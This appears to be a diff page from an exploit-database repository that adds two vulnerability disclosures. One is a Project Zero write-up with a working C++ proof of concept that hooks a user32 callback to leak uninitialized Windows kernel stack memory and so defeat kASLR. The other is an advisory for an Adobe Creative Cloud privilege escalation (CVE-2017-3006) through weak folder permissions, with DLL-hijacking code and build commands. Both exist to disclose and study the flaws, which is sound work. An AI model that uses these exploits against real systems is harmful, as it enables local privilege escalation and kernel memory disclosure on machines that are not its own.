https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41879.zip
|
212
platforms/windows/dos/41880.cpp
Executable file
212
platforms/windows/dos/41880.cpp
Executable file
|
@ -0,0 +1,212 @@
|
|||
/*
|
||||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1192
|
||||
|
||||
We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 10 indirectly through the win32k!NtUserPaintMenuBar system call, or more specifically, through the user32!fnINLPUAHDRAWMENUITEM user-mode callback (#107 on Windows 10 1607 32-bit).
|
||||
|
||||
In our tests, the callback is invoked under the following stack trace:
|
||||
|
||||
--- cut ---
|
||||
a75e6a8c 81b63813 nt!memcpy
|
||||
a75e6aec 9b1bb7bc nt!KeUserModeCallback+0x163
|
||||
a75e6c10 9b14ff79 win32kfull!SfnINLPUAHDRAWMENUITEM+0x178
|
||||
a75e6c68 9b1501a3 win32kfull!xxxSendMessageToClient+0xa9
|
||||
a75e6d20 9b15361c win32kfull!xxxSendTransformableMessageTimeout+0x133
|
||||
a75e6d44 9b114420 win32kfull!xxxSendMessage+0x20
|
||||
a75e6dec 9b113adc win32kfull!xxxSendMenuDrawItemMessage+0x102
|
||||
a75e6e48 9b1138f4 win32kfull!xxxDrawMenuItem+0xee
|
||||
a75e6ecc 9b110955 win32kfull!xxxMenuDraw+0x184
|
||||
a75e6f08 9b11084e win32kfull!xxxPaintMenuBar+0xe1
|
||||
a75e6f34 819a8987 win32kfull!NtUserPaintMenuBar+0x7e
|
||||
a75e6f34 77d74d50 nt!KiSystemServicePostCall
|
||||
00f3f08c 7489666a ntdll!KiFastSystemCallRet
|
||||
00f3f090 733ea6a8 win32u!NtUserPaintMenuBar+0xa
|
||||
00f3f194 733e7cef uxtheme!CThemeWnd::NcPaint+0x1fc
|
||||
00f3f1b8 733ef3c0 uxtheme!OnDwpNcActivate+0x3f
|
||||
00f3f22c 733ede88 uxtheme!_ThemeDefWindowProc+0x800
|
||||
00f3f240 75d8c2aa uxtheme!ThemeDefWindowProcW+0x18
|
||||
00f3f298 75d8be4a USER32!DefWindowProcW+0x14a
|
||||
00f3f2b4 75db53cf USER32!DefWindowProcWorker+0x2a
|
||||
00f3f2d8 75db8233 USER32!ButtonWndProcW+0x2f
|
||||
00f3f304 75d8e638 USER32!_InternalCallWinProc+0x2b
|
||||
00f3f3dc 75d8e3a5 USER32!UserCallWinProcCheckWow+0x218
|
||||
00f3f438 75da5d6f USER32!DispatchClientMessage+0xb5
|
||||
00f3f468 77d74c86 USER32!__fnDWORD+0x3f
|
||||
00f3f498 74894c3a ntdll!KiUserCallbackDispatcher+0x36
|
||||
00f3f49c 75d9c1a7 win32u!NtUserCreateWindowEx+0xa
|
||||
00f3f774 75d9ba68 USER32!VerNtUserCreateWindowEx+0x231
|
||||
00f3f84c 75d9b908 USER32!CreateWindowInternal+0x157
|
||||
00f3f88c 000d15b7 USER32!CreateWindowExW+0x38
|
||||
--- cut ---
|
||||
|
||||
The layout of the i/o structure passed down to the user-mode callback that we're seeing is as follows:
|
||||
|
||||
--- cut ---
|
||||
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ................
|
||||
00000070: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ................
|
||||
00000080: 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ................
|
||||
--- cut ---
|
||||
|
||||
Where 00 denote bytes which are properly initialized, while ff indicate uninitialized values copied back to user-mode. As shown above, there are 20 bytes leaked at offsets 0x6c-0x7f. We have determined that these bytes originally come from a smaller structure of size 0x74, allocated in the stack frame of the win32kfull!xxxSendMenuDrawItemMessage function.
|
||||
|
||||
We can easily demonstrate the vulnerability with a kernel debugger (WinDbg), by setting a breakpoint at win32kfull!xxxSendMenuDrawItemMessage, filling the local structure with a marker 0x41 ('A') byte after stepping through the function prologue, and then observing that these bytes indeed survived any kind of initialization and are printed out by the attached proof-of-concept program:
|
||||
|
||||
--- cut ---
|
||||
3: kd> ba e 1 win32kfull!xxxSendMenuDrawItemMessage
|
||||
3: kd> g
|
||||
Breakpoint 0 hit
|
||||
win32kfull!xxxSendMenuDrawItemMessage:
|
||||
9b11431e 8bff mov edi,edi
|
||||
1: kd> p
|
||||
win32kfull!xxxSendMenuDrawItemMessage+0x2:
|
||||
9b114320 55 push ebp
|
||||
1: kd> p
|
||||
win32kfull!xxxSendMenuDrawItemMessage+0x3:
|
||||
9b114321 8bec mov ebp,esp
|
||||
1: kd> p
|
||||
win32kfull!xxxSendMenuDrawItemMessage+0x5:
|
||||
9b114323 81ec8c000000 sub esp,8Ch
|
||||
1: kd> p
|
||||
win32kfull!xxxSendMenuDrawItemMessage+0xb:
|
||||
9b114329 a1e0dd389b mov eax,dword ptr [win32kfull!__security_cookie (9b38dde0)]
|
||||
1: kd> p
|
||||
win32kfull!xxxSendMenuDrawItemMessage+0x10:
|
||||
9b11432e 33c5 xor eax,ebp
|
||||
1: kd> p
|
||||
win32kfull!xxxSendMenuDrawItemMessage+0x12:
|
||||
9b114330 8945fc mov dword ptr [ebp-4],eax
|
||||
1: kd> p
|
||||
win32kfull!xxxSendMenuDrawItemMessage+0x15:
|
||||
9b114333 833d0ca6389b00 cmp dword ptr [win32kfull!gihmodUserApiHook (9b38a60c)],0
|
||||
1: kd> f ebp-78 ebp-78+74-1 41
|
||||
Filled 0x74 bytes
|
||||
1: kd> g
|
||||
--- cut ---
|
||||
|
||||
Then, the relevant part of the PoC output should be similar to the following:
|
||||
|
||||
--- cut ---
|
||||
00000000: 88 b2 12 01 92 00 00 00 00 00 00 00 01 00 00 00 ................
|
||||
00000010: 00 00 00 00 39 05 00 00 01 00 00 00 00 01 00 00 ....9...........
|
||||
00000020: 61 02 0a 00 1a 08 01 01 08 00 00 00 1f 00 00 00 a...............
|
||||
00000030: 50 00 00 00 32 00 00 00 00 00 00 00 61 02 0a 00 P...2.......a...
|
||||
00000040: 1a 08 01 01 00 0a 00 00 00 00 00 00 00 00 00 00 ................
|
||||
00000050: 00 00 00 00 3a 00 00 00 0f 00 00 00 00 00 00 00 ....:...........
|
||||
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 41 41 41 41 ............AAAA
|
||||
00000070: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||
00000080: a0 64 d8 77 60 66 d8 77 ?? ?? ?? ?? ?? ?? ?? ?? .d.w`f.w........
|
||||
--- cut ---
|
||||
|
||||
The 20 aforementioned bytes are clearly leaked to ring-3 in an unmodified, uninitialized form. If we don't manually insert markers into the kernel stack, an example output of the PoC can be as follows:
|
||||
|
||||
--- cut ---
|
||||
00000000: 88 b2 ab 01 92 00 00 00 00 00 00 00 01 00 00 00 ................
|
||||
00000010: 00 00 00 00 39 05 00 00 01 00 00 00 00 01 00 00 ....9...........
|
||||
00000020: db 01 1d 00 47 08 01 17 08 00 00 00 1f 00 00 00 ....G...........
|
||||
00000030: 50 00 00 00 32 00 00 00 00 00 00 00 db 01 1d 00 P...2...........
|
||||
00000040: 47 08 01 17 00 0a 00 00 00 00 00 00 00 00 00 00 G...............
|
||||
00000050: 00 00 00 00 3a 00 00 00 0f 00 00 00 00 00 00 00 ....:...........
|
||||
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 28 d3 ab 81 ............(...
|
||||
00000070: 80 aa 20 9b 33 26 fb af fe ff ff ff 00 5e 18 94 .. .3&.......^..
|
||||
00000080: a0 64 d8 77 60 66 d8 77 ?? ?? ?? ?? ?? ?? ?? ?? .d.w`f.w........
|
||||
--- cut ---
|
||||
|
||||
Starting at offset 0x6C, we can observe leaked contents of a kernel _EH3_EXCEPTION_REGISTRATION structure:
|
||||
|
||||
.Next = 0x81abd328
|
||||
.ExceptionHandler = 0x9b20aa80
|
||||
.ScopeTable = 0xaffb2633
|
||||
.TryLevel = 0xfffffffe
|
||||
|
||||
This immediately discloses the address of the kernel-mode stack and the win32k image in memory -- information that is largely useful for local attackers seeking to defeat the kASLR exploit mitigation, or disclose other sensitive data stored in the kernel address space.
|
||||
*/
|
||||
|
||||
#include <Windows.h>
|
||||
#include <cstdio>
|
||||
|
||||
namespace globals {
|
||||
LPVOID (WINAPI *Orig_fnINLPUAHDRAWMENUITEM)(LPVOID);
|
||||
} // namespace globals;
|
||||
|
||||
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
|
||||
for (ULONG i = 0; i < dwBytes; i += 16) {
|
||||
printf("%.8x: ", i);
|
||||
|
||||
for (ULONG j = 0; j < 16; j++) {
|
||||
if (i + j < dwBytes) {
|
||||
printf("%.2x ", Data[i + j]);
|
||||
}
|
||||
else {
|
||||
printf("?? ");
|
||||
}
|
||||
}
|
||||
|
||||
for (ULONG j = 0; j < 16; j++) {
|
||||
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
|
||||
printf("%c", Data[i + j]);
|
||||
}
|
||||
else {
|
||||
printf(".");
|
||||
}
|
||||
}
|
||||
|
||||
printf("\n");
|
||||
}
|
||||
}
|
||||
|
||||
PVOID *GetUser32DispatchTable() {
|
||||
__asm{
|
||||
mov eax, fs:30h
|
||||
mov eax, [eax + 0x2c]
|
||||
}
|
||||
}
|
||||
|
||||
BOOL HookUser32DispatchFunction(UINT Index, PVOID lpNewHandler, PVOID *lpOrigHandler) {
|
||||
PVOID *DispatchTable = GetUser32DispatchTable();
|
||||
DWORD OldProtect;
|
||||
|
||||
if (!VirtualProtect(DispatchTable, 0x1000, PAGE_READWRITE, &OldProtect)) {
|
||||
printf("VirtualProtect#1 failed, %d\n", GetLastError());
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
*lpOrigHandler = DispatchTable[Index];
|
||||
DispatchTable[Index] = lpNewHandler;
|
||||
|
||||
if (!VirtualProtect(DispatchTable, 0x1000, OldProtect, &OldProtect)) {
|
||||
printf("VirtualProtect#2 failed, %d\n", GetLastError());
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
LPVOID WINAPI fnINLPUAHDRAWMENUITEM_Hook(LPVOID Data) {
|
||||
printf("----------\n");
|
||||
PrintHex((PBYTE)Data, 0x88);
|
||||
return globals::Orig_fnINLPUAHDRAWMENUITEM(Data);
|
||||
}
|
||||
|
||||
int main() {
|
||||
// Hook the user32!fnINLPUAHDRAWMENUITEM user-mode callback dispatch function.
|
||||
// The #107 index is specific to Windows 10 1607 32-bit.
|
||||
if (!HookUser32DispatchFunction(107, fnINLPUAHDRAWMENUITEM_Hook, (PVOID *)&globals::Orig_fnINLPUAHDRAWMENUITEM)) {
|
||||
return 1;
|
||||
}
|
||||
|
||||
// Create a menu.
|
||||
HMENU hmenu = CreateMenu();
|
||||
AppendMenu(hmenu, MF_STRING, 1337, L"Menu item");
|
||||
|
||||
// Create a window with the menu in order to trigger the vulnerability.
|
||||
HWND hwnd = CreateWindowW(L"BUTTON", L"TestWindow", WS_OVERLAPPEDWINDOW | WS_VISIBLE,
|
||||
CW_USEDEFAULT, CW_USEDEFAULT, 100, 100, NULL, hmenu, 0, 0);
|
||||
DestroyWindow(hwnd);
|
||||
|
||||
return 0;
|
||||
}
|
135
platforms/windows/local/41878.txt
Executable file
135
platforms/windows/local/41878.txt
Executable file
|
@ -0,0 +1,135 @@
|
|||
[+] Credits: John Page aka hyp3rlinx
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/ADOBE-CREATIVE-CLOUD-PRIVILEGE-ESCALATION.txt
|
||||
[+] ISR: apparitionSec
|
||||
|
||||
|
||||
|
||||
Vendor:
|
||||
==============
|
||||
www.adobe.com
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
========================================
|
||||
Adobe Creative Cloud Desktop Application
|
||||
<= v4.0.0.185
|
||||
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
=====================
|
||||
Privilege Escalation
|
||||
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
CVE-2017-3006
|
||||
APSB17-13
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
=====================
|
||||
Adobe CC uses weak insecure permissions settings on the "Adobe Photoshop dll & Startup Scripts" directories. This may allow authenticated users
|
||||
to execute arbitrary code in the security context of ANY other users with elevated privileges on the affected system. Issue is the 'C' flag
|
||||
(Change) for 'Authenticated Users' group.
|
||||
|
||||
|
||||
References:
|
||||
============
|
||||
https://helpx.adobe.com/security/products/creative-cloud/apsb17-13.html
|
||||
|
||||
|
||||
e.g.
|
||||
|
||||
C:\Program Files (x86)\Common Files\Adobe\32 bit Photoshop dlls>cacls * | more
|
||||
C:\Program Files (x86)\Common Files\Adobe\32 bit Photoshop dlls\libifcoremd.dll BUILTIN\Administrators:(ID)F
|
||||
NT AUTHORITY\SYSTEM:(ID)F
|
||||
BUILTIN\Users:(ID)R
|
||||
NT AUTHORITY\Authenticated Users:(ID)C
|
||||
|
||||
C:\Program Files (x86)\Common Files\Adobe\32 bit Photoshop dlls\libmmd.dll BUILTIN\Administrators:(ID)F
|
||||
NT AUTHORITY\SYSTEM:(ID)F
|
||||
BUILTIN\Users:(ID)R
|
||||
NT AUTHORITY\Authenticated Users:(ID)C
|
||||
|
||||
|
||||
|
||||
C:\Program Files (x86)\Common Files\Adobe\32 bit Photoshop dlls>ls -lt
|
||||
total 2407
|
||||
-rwxr-xr-x 1 Test Administ 895184 Jun 3 2016 libifcoremd.dll
|
||||
-rwxr-xr-x 1 Test Administ 4033464 Jun 3 2016 libmmd.dll
|
||||
|
||||
|
||||
/////////// AND /////////////////////
|
||||
|
||||
|
||||
C:\Program Files (x86)\Common Files\Adobe\Startup Scripts CC\Adobe Photoshop>cacls * | more
|
||||
C:\Program Files (x86)\Common Files\Adobe\Startup Scripts CC\Adobe Photoshop\photoshop BUILTIN\Administrators:(ID)F
|
||||
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
|
||||
NT AUTHORITY\SYSTEM:(ID)F
|
||||
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
|
||||
BUILTIN\Users:(OI)(CI)(ID)R
|
||||
NT AUTHORITY\Authenticated Users:(ID)C
|
||||
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
|
||||
|
||||
C:\Program Files (x86)\Common Files\Adobe\Startup Scripts CC\Adobe Photoshop\photoshop.jsx BUILTIN\Administrators:(ID)F
|
||||
NT AUTHORITY\SYSTEM:(ID)F
|
||||
BUILTIN\Users:(ID)R
|
||||
NT AUTHORITY\Authenticated Users:(ID)C
|
||||
|
||||
|
||||
|
||||
|
||||
Exploit/POC code(s):
|
||||
====================
|
||||
Compile below DLL 'C' code name it as "libifcoremd.dll"
|
||||
Replace existing Adobe CC "libifcoremd.dll" file, wait for it to be referenced.
|
||||
|
||||
|
||||
#include <windows.h>
|
||||
|
||||
BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
|
||||
switch (reason) {
|
||||
case DLL_PROCESS_ATTACH:
|
||||
MessageBox(NULL, NULL, "PWN!", MB_OK);
|
||||
break;
|
||||
}
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
|
||||
gcc -c libifcoremd.c
|
||||
gcc -shared -o libifcoremd.dll libifcoremd.o
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
========================================
|
||||
Vendor Notification: January 25, 2017
|
||||
Vendor updates Adobe CC : April 11, 2017
|
||||
April 12, 2017 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Local
|
||||
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere. All content (c).
|
Loading…
Add table
Reference in a new issue